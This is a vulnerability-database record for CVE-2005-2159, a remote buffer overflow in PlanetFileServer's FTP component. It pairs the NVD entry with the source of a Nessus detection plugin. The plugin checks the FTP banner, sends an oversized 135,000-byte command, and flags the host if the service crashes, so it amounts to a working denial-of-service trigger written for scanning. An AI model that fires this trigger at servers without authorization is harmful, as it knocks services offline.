{"cve": [{"lastseen": "2019-05-29T18:08:14", "bulletinFamily": "NVD", "description": "mshftp.dll in PlanetDNS PlanetFileServer 2.0.1.3 allows remote attackers to cause a denial of service (application crash) via a long request.", "modified": "2016-10-18T03:25:00", "id": "CVE-2005-2159", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2159", "published": "2005-07-06T04:00:00", "title": "CVE-2005-2159", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "nessus": [{"lastseen": "2019-12-13T08:52:26", "bulletinFamily": "scanner", "description": "The remote host appears to be running PlanetFileServer, an FTP server\nfor Windows from PlanetDNS. \n\nThe installed version of PlanetFileServer is vulnerable to a buffer\noverflow when processing large commands. An unauthenticated attacker\ncan trigger this flaw to crash the service or execute arbitrary code\nas administrator.", "modified": "2019-12-02T00:00:00", "id": "PLANETFILESERVER_OVERFLOW.NASL", "href": "https://www.tenable.com/plugins/nessus/18611", "published": "2005-07-05T00:00:00", "title": "PlanetFileServer mshftp.dll Data Processing Remote Overflow", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif (description) {\n script_id(18611);\n script_version(\"1.19\");\n\n script_cve_id(\"CVE-2005-2159\");\n script_bugtraq_id(14138);\n\n script_name(english:\"PlanetFileServer mshftp.dll Data Processing Remote Overflow\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FTP server is prone to a buffer overflow attack.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host appears to be running PlanetFileServer, an FTP server\nfor Windows from PlanetDNS. \n\nThe installed version of PlanetFileServer is vulnerable to a buffer\noverflow when processing large commands. An unauthenticated attacker\ncan trigger this flaw to crash the service or execute arbitrary code\nas administrator.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/404161/30/0/threaded\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Unknown at this time.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/07/05\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/07/04\");\n script_cvs_date(\"Date: 2018/11/15 20:50:22\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n script_summary(english:\"Checks for remote buffer overflow vulnerability in PlanetFileServer\");\n script_category(ACT_DENIAL);\n script_family(english:\"FTP\");\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_dependencie(\"ftpserver_detect_type_nd_version.nasl\", \"ftp_overflow.nasl\");\n script_exclude_keys(\"ftp/msftpd\", \"ftp/ncftpd\", \"ftp/fw1ftpd\", \"ftp/vxftpd\");\n script_require_ports(\"Services/ftp\", 21);\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"ftp_func.inc\");\n\n\nport = get_ftp_port(default: 21);\n\n\n# If the banner suggests it's for PlanetFileServer...\nbanner = get_ftp_banner(port: port);\nif (! banner) exit(1, \"No FTP banner on port \"+port+\".\");\nif (\n egrep(string:banner, pattern:\"^220[ -]mshftp/.+ NewAce Corporation\")\n) {\n c = crap(135000) + '\\r\\n';\n\n # nb: fRoGGz claims you may need to send the command 2 times\n # depending on the configured security filter option levels.\n i = 0;\n while((soc = open_sock_tcp(port)) && i++ < 2) {\n # Send a long command.\n send(socket:soc, data:c);\n close(soc);\n sleep(1);\n }\n\n # There's a problem if we can't open a connection after sending \n # the exploit at least once.\n if (i > 0) {\n if (service_is_dead(port: port) > 0)\n security_hole(port);\n exit(0);\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}]}